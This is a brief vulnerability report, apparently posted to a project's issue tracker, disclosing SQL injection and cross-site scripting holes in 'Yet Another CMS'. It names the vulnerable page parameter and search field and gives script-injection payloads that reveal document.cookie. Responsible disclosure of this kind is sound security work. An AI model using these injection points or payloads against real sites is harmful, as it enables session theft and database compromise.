This project is read-only.

SQL Injection & XSS vulnerabilities

description

Hi,
 
I've found some security vulnerabilities in the latest version of Yet Another CMS.
 
SQL Injection
 
http://<target>/index.php?page=[sql injection]
http://<target>/search.php -> 'search field' -> [sql injection]
 
XSS
 
http://<target>/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://<target>/index.php?page='</script><script>alert(document.cookie)</script>
 
Best Regards,
sschurtz
